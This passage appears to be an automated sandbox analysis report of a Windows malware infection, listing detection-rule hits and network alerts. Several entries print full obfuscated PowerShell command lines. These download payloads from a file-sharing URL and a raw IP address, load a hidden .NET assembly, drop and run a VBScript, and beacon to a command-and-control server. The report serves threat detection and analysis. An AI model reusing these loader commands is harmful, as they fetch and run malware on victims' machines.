(3ZDbase64Command.ToCharArray() zwv ForEach-Object { 3ZD_ '+'})[-'+'1..-(3ZDbase64Command.Lengt'+'h)];3ZDcommandBytes = [System.Convert]::FromBase64String(3ZDbase64Reverse'+'d);3ZDloadedAssembly = [System.Refle'+'ction.Assembly]::Load(3ZDcommandByte'+'s);3ZDvaiMethod = [dnlib.IO.Home'+'].GetMethod(IuaVAIIua);'+'3ZDvaiMethod.Invoke(3ZDnull, @(Iuatxt.KLGOL/33/631.342.3.291//:p'+'tthIua'+', Iuad'+'esativadoIua, IuadesativadoIua, Iuadesativ'+'adoIua, Iuaaspnet_compilerIua, Iuadesati'+'vadoIua, IuadesativadoIua,Iu'+'adesativadoIua,IuadesativadoIua,IuadesativadoIu'+'a,IuadesativadoIu'+'a,IuadesativadoIua,I'+'ua1Iua,IuadesativadoIua)'+');') -CReplace([ChAr]73+[ChAr]117+[ChAr]97),[ChAr]39 -CReplace([ChAr]51+[ChAr]90+[ChAr]68),[ChAr]36-CReplace ([ChAr]122+[ChAr]119+[ChAr]118),[ChAr]124))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5820, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", ProcessId: 2736, ProcessName: aspnet_compiler.exe
                Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'aWVYICggKCgnM1pEaW1hZ2VVcmwgPSBJdWFodHRwczovLzEwMTcuZmlsZW1haWwuY29tL2FwaS9maWxlL2dldD9maWxla2V5PTJBYV9iV285UmV1NDV0N0JVMWtWZ3NkOXBUOXBnU1NsdlN0R3JuVElDZkZobVQnKydLJysnajNMQzZTUXRJY09jX1QzNXcmcGtfdmlkPWZkNGY2MTQnKydiYjIwJysnOWM2MmMxNzMwJysnOTQ1MTc2YTA5MCcrJzRmIEl1JysnYTszWkR3ZWJDbCcrJ2llbnQgPSBOZXctT2JqZWN0IFN5cycrJ3RlbS5OJysnZXQuV2ViQ2xpZW50OzNaRGltYWdlQnl0ZXMgPSAzWkR3ZWJDbGllbnQuRG93bmxvYWREYXRhKDNaRGltYWdlVXJsKTszWkRpbWFnZVRleHQgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkcnKydldFN0cmluZycrJygzWkRpbWFnZUJ5dGVzKTszWkRzdGFydEZsJysnYWcgPSBJdWE8PEJBU0U2NF9TVEFSVD4+SXVhOzNaRGVuZEZsYWcgPSBJdWE8PEJBU0U2NF9FTkQ+Pkl1JysnYTszWkRzdGFydEluZGV4ID0gM1pEaW1hZ2UnKydUZXh0LkluZGV4T2YoM1pEc3RhcnRGbGFnKTszWkRlbmRJbmRleCA9IDNaRGltYWdlVGV4dC5JbmRleE9mKDNaRGVuZEZsJysnYWcpOzNaRHN0YXJ0SW5kZXggLWdlIDAgLWFuZCAzWkRlbmRJbmRleCAtZ3QgM1pEc3RhcnRJbmRleDszWkRzdGFydEluZGV4ICs9IDNaRHN0YXJ0RmxhZy5MZW5ndGg7M1pEYmFzZTY0TGVuZ3RoID0gM1onKydEZW5kSW5kZXggLSAzWkRzdGFydEluZGV4JysnOzNaJysnRGJhc2U2JysnNENvbW1hbmQgPSAzWkRpbWFnZVRleHQuU3Vic3RyaW5nKDNaRHN0YXJ0SW5kZXgsIDNaRGInKydhc2U2NExlbmcnKyd0aCk7M1pEYmFzZTY0UmV2ZXJzZWQgPSAtam9pbiAoM1pEYmFzZTY0Q29tbWFuZC5Ub0NoYXJBcnJheSgpIHp3diBGb3JFYWNoLU9iamVjdCB7IDNaRF8gJysnfSlbLScrJzEuLi0oM1pEYmFzZTY0Q29tbWFuZC5MZW5ndCcrJ2gpXTszWkRjb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKDNaRGJhc2U2NFJldmVyc2UnKydkKTszWkRsb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGUnKydjdGlvbi5Bc3NlbWJseV06OkxvYWQoM1pEY29tbWFuZEJ5dGUnKydzKTszWkR2YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZScrJ10uR2V0TWV0aG9kKEl1YVZBSUl1YSk7JysnM1pEdmFpTWV0aG9kLkludm9rZSgzWkRudWxsLCBAKEl1YXR4dC5LTEdPTC8zMy82MzEuMzQyLjMuMjkxLy86cCcrJ3R0aEl1YScrJywgSXVhZCcrJ2VzYXRpdmFkb0l1YSwgSXVhZGVzYXRpdmFkb0l1YSwgSXVhZGVzYXRpdicrJ2Fkb0l1YSwgSXVhYXNwbmV0X2NvbXBpbGVySXVhLCBJdWFkZXNhdGknKyd2YWRvSXVhLCBJdWFkZXNhdGl2YWRvSXVhLEl1JysnYWRlc2F0aXZhZG9JdWEsSXVhZGVzYXRpdmFkb0l1YSxJdWFkZXNhdGl2YWRvSXUnKydhLEl1YWRlc2F0aXZhZG9JdScrJ2EsSXVhZGVzYXRpdmFkb0l1YSxJJysndWExSXVhLEl1YWRlc2F0aXZhZG9JdWEpJysnKTsnKSAgLUNSZXBsYWNlKFtDaEFyXTczK1tDaEFyXTExNytbQ2hBcl05NyksW0NoQXJdMzkgLUNSZXBsYWNlKFtDaEFyXTUxK1tDaEFyXTkwK1tDaEFyXTY4KSxbQ2hBcl0zNi1DUmVwbGFjZSAgKFtDaEFyXTEyMitbQ2hBcl0xMTkrW0NoQXJdMTE4KSxbQ2hBcl0xMjQpKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'aWVYICggKCgnM1pEaW1hZ2VVcmwgPSBJdWFodHRwczovLzEwMTcuZmlsZW1haWwuY29tL2FwaS9maWxlL2dldD9maWxla2V5PTJBYV9iV285UmV1NDV0N0JVMWtWZ3NkOXBUOXBnU1NsdlN0R3JuVElDZkZobVQnKydLJysnajNMQzZTUXRJY09jX1QzNXcmcGtfdmlkPWZkNGY2MTQnKydiYjIwJysnOWM2MmMxNzMwJysnOTQ1MTc2YTA5MCcrJzRmIEl1JysnYTszWkR3ZWJDbCcrJ2llbnQgPSBOZXctT2JqZWN0IFN5cycrJ3RlbS5OJysnZXQuV2ViQ2xpZW50OzNaRGltYWdlQnl0ZXMgPSAzWkR3ZWJDbGllbnQuRG93bmxvYWREYXRhKDNaRGltYWdlVXJsKTszWkRpbWFnZVRleHQgPSBbU3lzdGVtLlRleHQuRW5jb2Rpbmdd
                Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dnftngtc\dnftngtc.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dnftngtc\dnftngtc.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\sySTeM32\wIndOWSpoweRShEll\V1.0\POwERsHeLl.EXE" "pOWersHELl -EX byPass -Nop -W 1 -C DEVICecrEdEntialDEploymenT ; invoke-eXPrEssIOn($(invOKE-eXPrEsSION('[sYStem.TEXt.ENcODiNg]'+[chAR]58+[ChAR]58+'UtF8.gETstrInG([sYstem.cONVErt]'+[cHAr]58+[ChAR]0x3a+'frOMBASE64STriNg('+[ChAr]34+'JHBmWHRRICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lbUJlcmRlRmluSVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTU9OLkRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpUa1puTFpUZ1RCLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZrLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxEQyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFwT1l2aWhjLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE5qUmNkQ2pXKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiT3JjWUR2USIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZXNwQWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUEJvc0lTUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkcGZYdFE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTM2LzMzL3NlZW15YmVzdHRoaW5nc3doaWNoY2FsbHlvdWJhYnlnaXJsd2hpY2hnaXZldWhvdGNoaWNrcy50SUYiLCIkRW5WOkFQUERBVEFcc2VlbXliZXN0dGhpbmdzd2hpY2hjYWxseW91YmFieWdpcmx3aGljaGdpdmV1aC52YlMiLDAsMCk7U3RBUnQtU0xlRVAoMyk7SUVYICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlblY6QVBQREFUQVxzZWVteWJlc3R0aGluZ3N3aGljaGNhbGx5b3ViYWJ5Z2lybHdoaWNoZ2l2ZXVoLnZiUyI='+[ChaR]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6884, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dnftngtc\dnftngtc.cmdline", ProcessId: 5104, ProcessName: csc.exe
                Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6884, TargetFilename: C:\Users\user\AppData\Roaming\seemybestthingswhichcallyoubabygirlwhichgiveuh.vbS
                Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemybestthingswhichcallyoubabygirlwhichgiveuh.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemybestthingswhichcallyoubabygirlwhichgiveuh.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Windows\sySTeM32\wIndOWSpoweRShEll\V1.0\POwERsHeLl.EXE" "pOWersHELl -EX byPass -Nop -W 1 -C DEVICecrEdEntialDEploymenT ; invoke-eXPrEssIOn($(invOKE-eXPrEsSION('[sYStem.TEXt.ENcODiNg]'+[chAR]58+[ChAR]58+'UtF8.gETstrInG([sYstem.cONVErt]'+[cHAr]58+[ChAR]0x3a+'frOMBASE64STriNg('+[ChAr]34+'JHBmWHRRICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lbUJlcmRlRmluSVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTU9OLkRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpUa1puTFpUZ1RCLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZrLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxEQyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFwT1l2aWhjLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE5qUmNkQ2pXKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiT3JjWUR2USIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZXNwQWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUEJvc0lTUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkcGZYdFE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTM2LzMzL3NlZW15YmVzdHRoaW5nc3doaWNoY2FsbHlvdWJhYnlnaXJsd2hpY2hnaXZldWhvdGNoaWNrcy50SUYiLCIkRW5WOkFQUERBVEFcc2VlbXliZXN0dGhpbmdzd2hpY2hjYWxseW91YmFieWdpcmx3aGljaGdpdmV1aC52YlMiLDAsMCk7U3RBUnQtU0xlRVAoMyk7SUVYICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlblY6QVBQREFUQVxzZWVteWJlc3R0aGluZ3N3aGljaGNhbGx5b3ViYWJ5Z2lybHdoaWNoZ2l2ZXVoLnZiUyI='+[ChaR]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6884, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemybestthingswhichcallyoubabygirlwhichgiveuh.vbS" , ProcessId: 7068, ProcessName: wscript.exe
                Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6884, TargetFilename: C:\Users\user\AppData\Local\Temp\dnftngtc\dnftngtc.cmdline
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\sySTeM32\wIndOWSpoweRShEll\V1.0\POwERsHeLl.EXE" "pOWersHELl -EX byPass -Nop -W 1 -C DEVICecrEdEntialDEploymenT ; invoke-eXPrEssIOn($(invOKE-eXPrEsSION('[sYStem.TEXt.ENcODiNg]'+[chAR]58+[ChAR]58+'UtF8.gETstrInG([sYstem.cONVErt]'+[cHAr]58+[ChAR]0x3a+'frOMBASE64STriNg('+[ChAr]34+'JHBmWHRRICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lbUJlcmRlRmluSVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTU9OLkRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpUa1puTFpUZ1RCLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZrLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxEQyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFwT1l2aWhjLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE5qUmNkQ2pXKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiT3JjWUR2USIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZXNwQWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUEJvc0lTUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkcGZYdFE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTM2LzMzL3NlZW15YmVzdHRoaW5nc3doaWNoY2FsbHlvdWJhYnlnaXJsd2hpY2hnaXZldWhvdGNoaWNrcy50SUYiLCIkRW5WOkFQUERBVEFcc2VlbXliZXN0dGhpbmdzd2hpY2hjYWxseW91YmFieWdpcmx3aGljaGdpdmV1aC52YlMiLDAsMCk7U3RBUnQtU0xlRVAoMyk7SUVYICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlblY6QVBQREFUQVxzZWVteWJlc3R0aGluZ3N3aGljaGNhbGx5b3ViYWJ5Z2lybHdoaWNoZ2l2ZXVoLnZiUyI='+[ChaR]34+'))')))", CommandLine: "C:\Windows\sySTeM32\wIndOWSpoweRShEll\V1.0\POwERsHeLl.EXE" "pOWersHELl -EX byPass -Nop -W 1 -C DEVICecrEdEntialDEploymenT ; invoke-eXPrEssIOn($(invOKE-eXPrEsSION('[sYStem.TEXt.ENcODiNg]'+[chAR]58+[ChAR]58+'UtF8.gETstrInG([sYstem.cONVErt]'+[cHAr]58+[ChAR]0x3a+'frOMBASE64STriNg('+[ChAr]34+'JHBmWHRRICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lbUJlcmRlRmluSVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTU9OLkRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpUa1puTFpUZ1RCLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZrLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxEQyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFwT1l2aWhjLEludFB0ciAgICAgICAgICA
                Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "ieX ( (('3ZDimageUrl = Iuahttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmT'+'K'+'j3LC6SQtIcOc_T35w&pk_vid=fd4f614'+'bb20'+'9c62c1730'+'945176a090'+'4f Iu'+'a;3ZDwebCl'+'ient = New-Object Sys'+'tem.N'+'et.WebClient;3ZDimageBytes = 3ZDwebClient.DownloadData(3ZDimageUrl);3ZDimageText = [System.Text.Encoding]::UTF8.G'+'etString'+'(3ZDimageBytes);3ZDstartFl'+'ag = Iua<<BASE64_START>>Iua;3ZDendFlag = Iua<<BASE64_END>>Iu'+'a;3ZDstartIndex = 3ZDimage'+'Text.IndexOf(3ZDstartFlag);3ZDendIndex = 3ZDimageText.IndexOf(3ZDendFl'+'ag);3ZDstartIndex -ge 0 -and 3ZDendIndex -gt 3ZDstartIndex;3ZDstartIndex += 3ZDstartFlag.Length;3ZDbase64Length = 3Z'+'DendIndex - 3ZDstartIndex'+';3Z'+'Dbase6'+'4Command = 3ZDimageText.Substring(3ZDstartIndex, 3ZDb'+'ase64Leng'+'th);3ZDbase64Reversed = -join (3ZDbase64Command.ToCharArray() zwv ForEach-Object { 3ZD_ '+'})[-'+'1..-(3ZDbase64Command.Lengt'+'h)];3ZDcommandBytes = [System.Convert]::FromBase64String(3ZDbase64Reverse'+'d);3ZDloadedAssembly = [System.Refle'+'ction.Assembly]::Load(3ZDcommandByte'+'s);3ZDvaiMethod = [dnlib.IO.Home'+'].GetMethod(IuaVAIIua);'+'3ZDvaiMethod.Invoke(3ZDnull, @(Iuatxt.KLGOL/33/631.342.3.291//:p'+'tthIua'+', Iuad'+'esativadoIua, IuadesativadoIua, Iuadesativ'+'adoIua, Iuaaspnet_compilerIua, Iuadesati'+'vadoIua, IuadesativadoIua,Iu'+'adesativadoIua,IuadesativadoIua,IuadesativadoIu'+'a,IuadesativadoIu'+'a,IuadesativadoIua,I'+'ua1Iua,IuadesativadoIua)'+');') -CReplace([ChAr]73+[ChAr]117+[ChAr]97),[ChAr]39 -CReplace([ChAr]51+[ChAr]90+[ChAr]68),[ChAr]36-CReplace ([ChAr]122+[ChAr]119+[ChAr]118),[ChAr]124))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "ieX ( (('3ZDimageUrl = Iuahttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmT'+'K'+'j3LC6SQtIcOc_T35w&pk_vid=fd4f614'+'bb20'+'9c62c1730'+'945176a090'+'4f Iu'+'a;3ZDwebCl'+'ient = New-Object Sys'+'tem.N'+'et.WebClient;3ZDimageBytes = 3ZDwebClient.DownloadData(3ZDimageUrl);3ZDimageText = [System.Text.Encoding]::UTF8.G'+'etString'+'(3ZDimageBytes);3ZDstartFl'+'ag = Iua<<BASE64_START>>Iua;3ZDendFlag = Iua<<BASE64_END>>Iu'+'a;3ZDstartIndex = 3ZDimage'+'Text.IndexOf(3ZDstartFlag);3ZDendIndex = 3ZDimageText.IndexOf(3ZDendFl'+'ag);3ZDstartIndex -ge 0 -and 3ZDendIndex -gt 3ZDstartIndex;3ZDstartIndex += 3ZDstartFlag.Length;3ZDbase64Length = 3Z'+'DendIndex - 3ZDstartIndex'+';3Z'+'Dbase6'+'4Command = 3ZDimageText.Substring(3ZDstartIndex, 3ZDb'+'ase64Leng'+'th);3ZDbase64Reversed = -join (3ZDbase64Command.ToCharArray() zwv ForEach-Object { 3ZD_ '+'})[-'+'1..-(3ZDbase64Command.Lengt'+'h)];3ZDcommandBytes = [System.Convert]::FromBase64String(3ZDbase64Reverse'+'d);3ZDloadedAssembly = [System.Refle'+'ction.Assembly]::Load(3ZDcommandByte'+'s);3ZDvaiMethod = [dnlib

                Data Obfuscation

                barindex
                Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dnftngtc\dnftngtc.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dnftngtc\dnftngtc.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\sySTeM32\wIndOWSpoweRShEll\V1.0\POwERsHeLl.EXE" "pOWersHELl -EX byPass -Nop -W 1 -C DEVICecrEdEntialDEploymenT ; invoke-eXPrEssIOn($(invOKE-eXPrEsSION('[sYStem.TEXt.ENcODiNg]'+[chAR]58+[ChAR]58+'UtF8.gETstrInG([sYstem.cONVErt]'+[cHAr]58+[ChAR]0x3a+'frOMBASE64STriNg('+[ChAr]34+'JHBmWHRRICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lbUJlcmRlRmluSVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTU9OLkRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpUa1puTFpUZ1RCLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZrLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxEQyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFwT1l2aWhjLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE5qUmNkQ2pXKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiT3JjWUR2USIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZXNwQWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUEJvc0lTUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkcGZYdFE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTM2LzMzL3NlZW15YmVzdHRoaW5nc3doaWNoY2FsbHlvdWJhYnlnaXJsd2hpY2hnaXZldWhvdGNoaWNrcy50SUYiLCIkRW5WOkFQUERBVEFcc2VlbXliZXN0dGhpbmdzd2hpY2hjYWxseW91YmFieWdpcmx3aGljaGdpdmV1aC52YlMiLDAsMCk7U3RBUnQtU0xlRVAoMyk7SUVYICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlblY6QVBQREFUQVxzZWVteWJlc3R0aGluZ3N3aGljaGNhbGx5b3ViYWJ5Z2lybHdoaWNoZ2l2ZXVoLnZiUyI='+[ChaR]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6884, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dnftngtc\dnftngtc.cmdline", ProcessId: 5104, ProcessName: csc.exe
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-15T18:14:29.539079+010020243121A Network Trojan was detected192.168.2.44973994.156.177.9580TCP
                2024-11-15T18:14:30.675330+010020243121A Network Trojan was detected192.168.2.44974094.156.177.9580TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-15T18:14:28.588137+010020253811Malware Command and Control Activity Detected192.168.2.44973994.156.177.9580TCP
                2024-11-15T18:14:29.696597+010020253811Malware Command and Control Activity Detected192.168.2.44974094.156.177.9580TCP
                2024-11-15T18:14:30.795104+010020253811Malware Command and Control Activity Detected192.168.2.44974194.156.177.9580TCP
                2024-11-15T18:14:31.919895+010020253811Malware Command and Control Activity Detected192.168.2.44974294.156.177.9580TCP
                2024-11-15T18:14:33.059121+010020253811Malware Command and Control Activity Detected192.168.2.44974394.156.177.9580TCP
                2024-11-15T18:14:34.179211+010020253811Malware Command and Control Activity Detected192.168.2.44974494.156.177.9580TCP
                2024-11-15T18:14:35.327062+010020253811Malware Command and Control Activity Detected192.168.2.44974594.156.177.9580TCP
                2024-11-15T18:14:36.470587+010020253811Malware Command and Control Activity Detected192.168.2.44974694.156.177.9580TCP
                2024-11-15T18:14:37.613187+010020253811Malware Command and Control Activity Detected192.168.2.44974794.156.177.9580TCP
                2024-11-15T18:14:38.767433+010020253811Malware Command and Control Activity Detected192.168.2.44974894.156.177.9580TCP
                2024-11-15T18:14:39.915789+010020253811Malware Command and Control Activity Detected192.168.2.44974994.156.177.9580TCP
                2024-11-15T18:14:41.021819+010020253811Malware Command and Control Activity Detected192.168.2.44975094.156.177.9580TCP
                2024-11-15T18:14:42.169695+010020253811Malware Command and Control Activity Detected192.168.2.44975194.156.177.9580TCP
                2024-11-15T18:14:43.295006+010020253811Malware Command and Control Activity Detected192.168.2.44975294.156.177.9580TCP
                2024-11-15T18:14:44.446888+010020253811Malware Command and Control Activity Detected192.168.2.44975394.156.177.9580TCP
                2024-11-15T18:14:45.590810+010020253811Malware Command and Control Activity Detected192.168.2.44975494.156.177.9580TCP
